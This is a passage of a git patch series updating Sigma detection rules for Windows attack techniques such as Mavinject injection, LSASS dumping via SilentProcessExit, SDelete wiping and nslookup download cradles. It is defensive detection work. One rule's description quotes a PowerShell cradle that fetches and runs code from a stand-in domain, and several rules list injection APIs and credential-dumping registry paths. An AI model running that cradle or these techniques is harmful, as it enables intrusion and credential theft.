insertions(+), 4 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml new file mode 100644 index 000000000..b7aca4c24 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml @@ -0,0 +1,31 @@ +title: Renamed Sysinternals Sdelete Usage +id: c1d867fe-8d95-4487-aab4-e53f2d339f90 +description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) +status: experimental +author: Florian Roth +date: 2022/09/06 +references: + - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md +tags: + - attack.impact + - attack.t1485 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'sdelete.exe' + filter: + Image|endswith: + - '\sdelete.exe' + - '\sdelete64.exe' + condition: selection and not filter +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator usage +level: high diff --git a/rules/windows/process_creation/proc_creation_win_sdelete.yml b/rules/windows/process_creation/proc_creation_win_sdelete.yml index b235477bd..0846681d4 100644 --- a/rules/windows/process_creation/proc_creation_win_sdelete.yml +++ b/rules/windows/process_creation/proc_creation_win_sdelete.yml @@ -3,8 +3,8 @@ id: a4824fca-976f-4964-b334-0621379e84c4 status: experimental author: frack113 date: 2021/06/03 -modified: 2022/08/13 -description: Use of SDelete to erase a file not the free space +modified: 2022/09/06 +description: Detects the use of SDelete to erase a file not the free space references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md tags: @@ -29,5 +29,5 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - System administrator Usage -level: medium + - System administrator usage +level: high From 4cdd5a5fecca2bcb0ae0267d515b410b81357507 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 6 Sep 2022 10:53:10 +0200 Subject: [PATCH 16/73] Update proc_creation_win_nslookup_pwsh_download_cradle.yml --- ...tion_win_nslookup_pwsh_download_cradle.yml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml index da49a404c..17d390701 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,18 +1,22 @@ title: Nslookup PwSh Download Cradle +id: 72671447-4352-4413-bb91-b85569687135 +status: experimental +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -description: 'This sexy sigma rule tries to detect sexy powershell download cradles. Ex: powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] ' -id: 72671447-4352-4413-bb91-b85569687135 -level: medium -status: experimental +tags: + - attack.command_and_control + - attack.t1105 + - attack.t1071.004 +references: + - https://twitter.com/alh4zr3d/status/1566489367232651264 logsource: category: process_creation product: windows detection: selection: - ParentImage|contains: powershell + ParentImage|endswith: '\powershell.exe' Image|contains: nslookup - CommandLine|contains: txt + CommandLine|contains: '=txt ' condition: selection -references: - - https://twitter.com/alh4zr3d/status/1566489367232651264 \ No newline at end of file +level: medium From 70f9a16149ff306bb43e473f46823232f105c360 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 6 Sep 2022 13:11:37 +0000 Subject: [PATCH 17/73] FIX: fixes missing string indicator. does not pass validate() check inside base.py --- rules/windows/file_change/file_change_win_2022_timestomping.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index 9becf4856..cfdf05658 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -23,7 +23,7 @@ detection: selection2: PreviousCreationUtcTime|startswith: '202' filter2: - CreationUtcTime|startswith: 202 + CreationUtcTime|startswith: '202' gen_filter_updates: - Image: - 'C:\Windows\system32\ProvTool.exe' From 7abe4a7c505c5883205602f7eaf31257236f8567 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 16:42:53 +0200 Subject: [PATCH 18/73] Update proc_creation_win_nslookup_poweshell_download.yml --- .../proc_creation_win_nslookup_poweshell_download.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml index 09f23188b..7466ddbef 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -19,7 +19,7 @@ detection: ParentImage|endswith: '\powershell.exe' Image|contains: '\nslookup.exe' CommandLine|contains: ' -q=txt ' - condition: 1 of slection_* + condition: 1 of selection_* falsepositives: - Unlikely level: high From 513922de9cde6d89031693f81946d538cf1f20a7 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 6 Sep 2022 16:52:12 +0200 Subject: [PATCH 19/73] fix: new FP with Onedrive --- ...gistry_set_asep_reg_keys_modification_currentversion.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index bf9e046d0..ad5a53caa 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/23 +modified: 2022/09/06 logsource: category: registry_set product: windows @@ -98,7 +98,9 @@ detection: - '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}' - '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}' filter_onedrive: - Details|startswith: 'C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\' + Details|startswith: + - 'C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\' + - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' From 4f69b7058ff2b3b450485a83488153fbfe4b22e0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 16:57:55 +0200 Subject: [PATCH 20/73] Update proc_creation_win_inline_win_api_access.yml --- .../proc_creation_win_inline_win_api_access.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml index 3b276add6..695e757d0 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -64,7 +64,10 @@ detection: - 'ntdll' - 'user32' # FP with chocolatey - 'secur32' - condition: selection + filter_defender: + Image|endswith: '\MpCmdRun.exe' + CommandLine|contains: ' -GetLoadLibraryWAddress32' + condition: selection and not 1 of filter_* falsepositives: - Unknown level: high From 1e2a894c2e068977bca501973693c0434c521690 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 17:19:46 +0200 Subject: [PATCH 21/73] Update posh_ps_adrecon_execution.yml --- .../powershell_script/posh_ps_adrecon_execution.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml index 799b4e99c..ef08b024f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml @@ -1,9 +1,9 @@ title: PowerShell ADRecon Execution id: bf72941a-cba0-41ea-b18c-9aca3925690d status: experimental -description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 +description: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 references: - - https://github.com/sense-of-security/ADRecon + - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1 - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319 tags: - attack.discovery @@ -11,7 +11,7 @@ tags: - attack.t1059.001 author: Bhabesh Raj date: 2021/07/16 -modified: 2021/10/16 +modified: 2022/09/06 logsource: product: windows category: ps_script @@ -20,6 +20,8 @@ detection: selection: ScriptBlockText|contains: - 'Function Get-ADRExcelComOb' + - 'Get-ADRGPO' + - 'Get-ADRDomainController' - 'ADRecon-Report.xlsx' #Default condition: selection falsepositives: From f952c02a5fd68744b6b10f45e5b1c9fc048fdfc1 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 22:59:24 +0200 Subject: [PATCH 22/73] Update after review --- ...roc_creation_win_inline_win_api_access.yml | 95 +++++++++---------- ...eation_win_nslookup_poweshell_download.yml | 4 +- 2 files changed, 49 insertions(+), 50 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml index 695e757d0..eee3f01c6 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -18,55 +18,52 @@ logsource: detection: selection: CommandLine|contains: - - 'WaitForSingleObject' - - 'QueueUserApc' - - 'RtlCreateUserThread' - - 'OpenProcess' - - 'VirtualAlloc' - - 'VirtualFree' - - 'WriteProcessMemory' - - 'CreateUserThread' - - 'CloseHandle' - - 'GetDelegateForFunctionPointer' - - 'CreateThread' - - 'memcpy' - - 'LoadLibrary' - - 'GetModuleHandle' - - 'GetProcAddress' - - 'VirtualProtect' - - 'FreeLibrary' - - 'ReadProcessMemory' - - 'CreateRemoteThread' - - 'AdjustTokenPrivileges' - - 'WriteInt32' - - 'OpenThreadToken' - - 'PtrToString' - - 'FreeHGlobal' - - 'ZeroFreeGlobalAllocUnicode' - - 'OpenProcessToken' - - 'GetTokenInformation' - - 'SetThreadToken' - - 'ImpersonateLoggedOnUser' - - 'RevertToSelf' - - 'GetLogonSessionData' - - 'CreateProcessWithToken' - - 'DuplicateTokenEx' - - 'OpenWindowStation' - - 'OpenDesktop' - - 'MiniDumpWriteDump' - - 'AddSecurityPackage' - - 'EnumerateSecurityPackages' - - 'GetProcessHandle' - - 'DangerousGetHandle' - - 'kernel32' - - 'Advapi32' - - 'msvcrt' - - 'ntdll' - - 'user32' # FP with chocolatey - - 'secur32' - filter_defender: - Image|endswith: '\MpCmdRun.exe' - CommandLine|contains: ' -GetLoadLibraryWAddress32' + - ' WaitForSingleObject ' + - ' QueueUserApc ' + - ' RtlCreateUserThread ' + - ' OpenProcess ' + - ' VirtualAlloc ' + - ' VirtualFree ' + - ' WriteProcessMemory ' + - ' CreateUserThread ' + - ' CloseHandle ' + - ' GetDelegateForFunctionPointer ' + - ' CreateThread ' + - ' memcpy ' + - ' LoadLibrary ' + - ' GetModuleHandle ' + - ' GetProcAddress ' + - ' VirtualProtect ' + - ' FreeLibrary ' + - ' ReadProcessMemory ' + - ' CreateRemoteThread ' + - ' AdjustTokenPrivileges ' + - ' WriteInt32 ' + - ' OpenThreadToken ' + - ' PtrToString ' + - ' FreeHGlobal ' + - ' ZeroFreeGlobalAllocUnicode ' + - ' OpenProcessToken ' + - ' GetTokenInformation ' + - ' SetThreadToken ' + - ' ImpersonateLoggedOnUser ' + - ' RevertToSelf ' + - ' GetLogonSessionData ' + - ' CreateProcessWithToken ' + - ' DuplicateTokenEx ' + - ' OpenWindowStation ' + - ' OpenDesktop ' + - ' MiniDumpWriteDump ' + - ' AddSecurityPackage ' + - ' EnumerateSecurityPackages ' + - ' GetProcessHandle ' + - ' DangerousGetHandle ' + - ' kernel32 ' + - ' Advapi32 ' + - ' msvcrt ' + - ' ntdll ' + - ' user32 ' # FP with chocolatey + - ' secur32 ' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml index 7466ddbef..5d1d84e07 100644 --- a/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -18,7 +18,9 @@ detection: selection_img: ParentImage|endswith: '\powershell.exe' Image|contains: '\nslookup.exe' - CommandLine|contains: ' -q=txt ' + CommandLine|contains: + - ' -q=txt ' + - ' -querytype=txt ' condition: 1 of selection_* falsepositives: - Unlikely From 62f5b327faf02f0bad0e070752e03a018e1c52a7 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 6 Sep 2022 23:04:48 +0200 Subject: [PATCH 23/73] Update proc_creation_win_inline_win_api_access.yml --- .../proc_creation_win_inline_win_api_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml index eee3f01c6..4abb41462 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -64,7 +64,7 @@ detection: - ' ntdll ' - ' user32 ' # FP with chocolatey - ' secur32 ' - condition: selection and not 1 of filter_* + condition: selection falsepositives: - Unknown level: high From dc90e08f3e1a63ed6d24435e702f307cca3ef39c Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 12:02:09 +0200 Subject: [PATCH 24/73] More updates --- .../create_stream_hash_susp_ip_domains.yml | 39 +++++++++++++++ ..._creation_mavinject_process_injection.yml} | 35 ++++++++------ .../proc_creation_win_mavinject_proc_inj.yml | 24 ---------- ...registry_event_silentprocessexit_lsass.yml | 14 ++++-- .../registry_set_globalflags_persistence.yml | 48 +++++++++---------- .../registry_set_silentprocessexit.yml | 2 +- 6 files changed, 93 insertions(+), 69 deletions(-) create mode 100644 rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml rename rules/windows/process_creation/{proc_creation_win_creation_mavinject_dll.yml => proc_creation_win_creation_mavinject_process_injection.yml} (51%) delete mode 100644 rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml new file mode 100644 index 000000000..c68a9ce6b --- /dev/null +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml @@ -0,0 +1,39 @@ +title: Unusual File Download from File Sharing Domain +id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 +status: experimental +description: Detects the download of suspicious file type from URLs with IP +author: Nasreddine Bencherchali +references: + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 +date: 2022/09/07 +logsource: + product: windows + category: create_stream_hash +detection: + selection_domain: + Contents|contains: + - '1.' + - '2.' + - '3.' + - '4.' + - '5.' + - '6.' + - '7.' + - '8.' + - '9.' + selection_extension: + TargetFilename|contains: + - '.ps1:Zone' + - '.bat:Zone' + - '.exe:Zone' + - '.vbe:Zone' + - '.vbs:Zone' + - '.dll:Zone' + - ':Zone' # No extension + condition: all of selection* +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1564.004 diff --git a/rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml b/rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml similarity index 51% rename from rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml rename to rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml index 0a098bb3f..07cd5caed 100644 --- a/rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml +++ b/rules/windows/process_creation/proc_creation_win_creation_mavinject_process_injection.yml @@ -1,40 +1,45 @@ title: Mavinject Inject DLL Into Running Process id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 +related: + - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 + type: obsoletes status: experimental -author: frack113 +author: frack113, Florian Roth date: 2021/07/12 -modified: 2022/07/11 -description: Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. +modified: 2022/09/07 +description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag or a renamed execution of the tool references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e + - https://twitter.com/gN3mes1s/status/941315826107510784 + - https://reaqta.com/2017/12/mavinject-microsoft-injector/ + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet tags: - attack.defense_evasion - - attack.collection + - attack.privilege_escalation + - attack.t1055.001 - attack.t1218.013 - - attack.t1056.004 logsource: category: process_creation product: windows detection: - selection_cli: - CommandLine|contains|all: - - ' /INJECTRUNNING' - - '.dll' # space some time in the end - selection_img: - - OriginalFileName: + selection_flag: + CommandLine|contains: ' /INJECTRUNNING ' + selection_renamed: + OriginalFileName: - 'mavinject32.exe' - 'mavinject64.exe' - - Image|endswith: # Event 4688 doesn't have the OriginalFileName field + filter_renamed: + Image|endswith: - '\mavinject32.exe' - '\mavinject64.exe' - condition: all of selection_* + condition: selection_flag or (selection_renamed and not filter_renamed) fields: - ComputerName - User - CommandLine - ParentCommandLine falsepositives: - - Unknown -level: medium + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml b/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml deleted file mode 100644 index 632e3ef71..000000000 --- a/rules/windows/process_creation/proc_creation_win_mavinject_proc_inj.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: MavInject Process Injection -id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 -status: stable -description: Detects process injection using the signed Windows tool Mavinject32.exe -author: Florian Roth -references: - - https://twitter.com/gN3mes1s/status/941315826107510784 - - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 -date: 2018/12/12 -modified: 2021/11/27 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: ' /INJECTRUNNING ' - condition: selection -falsepositives: - - Unknown -level: high -tags: - - attack.t1055.001 - - attack.t1218 diff --git a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml index 18f83195a..b1a0279f3 100644 --- a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml +++ b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml @@ -1,12 +1,16 @@ -title: SilentProcessExit Monitor Registrytion for LSASS +title: SilentProcessExit Monitor Registration for LSASS id: 55e29995-75e7-451a-bef0-6225e2f13597 -description: Detects changes to the Registry in which a monitor program gets registered to dump process memory of the lsass.exe process memory +related: + - id: 1f24c7c1-0b71-4e4e-8a6d-f863c9d8aa4a + type: similar +description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process status: experimental author: Florian Roth references: - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ date: 2021/02/26 +modified: 2022/09/07 tags: - attack.credential_access - attack.t1003.007 @@ -14,9 +18,9 @@ logsource: category: registry_event product: windows detection: - selection: + selection: TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe' condition: selection falsepositives: - - Unknown -level: critical \ No newline at end of file + - Unlikely +level: critical diff --git a/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml b/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml index ec2ae7a02..1837b12e6 100755 --- a/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml @@ -1,35 +1,35 @@ title: GlobalFlags Registry Persistence Mechanisms id: 36803969-5421-41ec-b92f-8500f79c23b0 status: test -description: Detects persistence using GlobalFlags in image file executiobn options +description: Detects persistence using GlobalFlags in image file execution options author: Karneades, Jonhnathan Ribeiro references: - - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ date: 2018/04/11 -modified: 2022/03/26 +modified: 2022/09/07 logsource: - category: registry_set - product: windows + category: registry_set + product: windows detection: - selection_reg1: - TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion' - selection_reg2: - - TargetObject|contains|all: - - '\Image File Execution Options\' - - '\GlobalFlag' - - TargetObject|contains|all: - - 'SilentProcessExit\' - - '\ReportingMode' - - TargetObject|contains|all: - - 'SilentProcessExit\' - - '\MonitorProcess' - condition: selection_reg1 and selection_reg2 + selection_reg1: + TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\' + selection_reg2: + - TargetObject|contains|all: + - '\Image File Execution Options\' + - '\GlobalFlag' + - TargetObject|contains|all: + - 'SilentProcessExit\' + - '\ReportingMode' + - TargetObject|contains|all: + - 'SilentProcessExit\' + - '\MonitorProcess' + condition: all of selection_* falsepositives: - - Unknown + - Unknown level: high tags: - - attack.privilege_escalation - - attack.persistence - - attack.defense_evasion - - attack.t1546.012 - - car.2013-01-002 + - attack.privilege_escalation + - attack.persistence + - attack.defense_evasion + - attack.t1546.012 + - car.2013-01-002 diff --git a/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml b/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml index 8766c4a55..8d398a926 100644 --- a/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml +++ b/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml @@ -1,4 +1,4 @@ -title: SilentProcessExit Monitor Registrytion +title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process status: experimental From df257caa4ca4b9cccff35a63e4f95d36b7ac77ad Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 12:17:18 +0200 Subject: [PATCH 25/73] Update create_stream_hash_susp_ip_domains.yml --- .../create_stream_hash_susp_ip_domains.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml index c68a9ce6b..fb83898d4 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml @@ -1,5 +1,5 @@ -title: Unusual File Download from File Sharing Domain -id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 +title: Unusual File Download from Direct IP Address +id: 025bd229-fd1f-4fdb-97ab-20006e1a5368 status: experimental description: Detects the download of suspicious file type from URLs with IP author: Nasreddine Bencherchali @@ -29,7 +29,6 @@ detection: - '.vbe:Zone' - '.vbs:Zone' - '.dll:Zone' - - ':Zone' # No extension condition: all of selection* falsepositives: - Unknown From bdccc5440a77e13394272cad707b722e37252092 Mon Sep 17 00:00:00 2001 From: Qasim Qlf <30376573+qasimqlf@users.noreply.github.com> Date: Wed, 7 Sep 2022 15:28:06 +0500 Subject: [PATCH 26/73] Update proc_creation_win_bad_opsec_sacrificial_processes.yml --- ..._creation_win_bad_opsec_sacrificial_processes.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml index ed0ee3f1d..edf67e4fa 100644 --- a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml @@ -7,7 +7,7 @@ related: description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard date: 2020/10/23 -modified: 2021/09/01 +modified: 2022/09/07 references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -25,19 +25,19 @@ logsource: detection: selection1: Image|endswith: '\WerFault.exe' - CommandLine|endswith: '\WerFault.exe' + CommandLine|endswith: 'WerFault.exe' selection2: Image|endswith: '\rundll32.exe' - CommandLine|endswith: '\rundll32.exe' + CommandLine|endswith: 'rundll32.exe' selection3: Image|endswith: '\regsvcs.exe' - CommandLine|endswith: '\regsvcs.exe' + CommandLine|endswith: 'regsvcs.exe' selection4: Image|endswith: '\regasm.exe' - CommandLine|endswith: '\regasm.exe' + CommandLine|endswith: 'regasm.exe' selection5: Image|endswith: '\regsvr32.exe' - CommandLine|endswith: '\regsvr32.exe' + CommandLine|endswith: 'regsvr32.exe' condition: 1 of selection* fields: - ParentImage From c6dc31fb48074578aac45f3c5072be347873a48a Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 14:07:04 +0200 Subject: [PATCH 27/73] Remove duplicate casing Removed cased names as SIGMA is case insensitive and the logs should searched case insensitively --- .../file_event_win_creation_system_file.yml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/rules/windows/file_event/file_event_win_creation_system_file.yml b/rules/windows/file_event/file_event_win_creation_system_file.yml index 099155e1d..d2e7cb5ca 100755 --- a/rules/windows/file_event/file_event_win_creation_system_file.yml +++ b/rules/windows/file_event/file_event_win_creation_system_file.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of an executable with a system process name in a suspicious folder author: Sander Wiebing, Tim Shelton date: 2020/05/26 -modified: 2022/07/27 +modified: 2022/09/07 tags: - attack.defense_evasion - attack.t1036.005 @@ -31,10 +31,8 @@ detection: - '\explorer.exe' - '\taskhost.exe' - '\Taskmgr.exe' - - '\taskmgr.exe' - '\sihost.exe' - '\RuntimeBroker.exe' - - '\runtimebroker.exe' - '\smartscreen.exe' - '\dllhost.exe' - '\audiodg.exe' @@ -42,13 +40,10 @@ detection: filter1: TargetFilename|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\system32\' - - 'C:\Windows\SysWow64\' - 'C:\Windows\SysWOW64\' - - 'C:\Windows\winsxs\' - 'C:\Windows\WinSxS\' - '\SystemRoot\System32\' - Image|endswith: + Image|endswith: - '\Windows\System32\dism.exe' - '\TiWorker.exe' filter2: @@ -67,5 +62,6 @@ detection: fields: - Image falsepositives: - - System processes copied outside the default folder + - System processes copied outside their default folders for testing purposes + - Third party software naming their software with the same names as the processes mentioned here level: high From 88e9794a74251934f0e5b91973ebf0935a959ae2 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 14:15:10 +0200 Subject: [PATCH 28/73] Update proc_creation_win_system_exe_anomaly.yml --- .../process_creation/proc_creation_win_system_exe_anomaly.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index 6113dbc86..fbc66ccbf 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -69,7 +69,7 @@ detection: - 'C:\Windows\System32\' - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - - 'C:\avast! sandbox' + # - 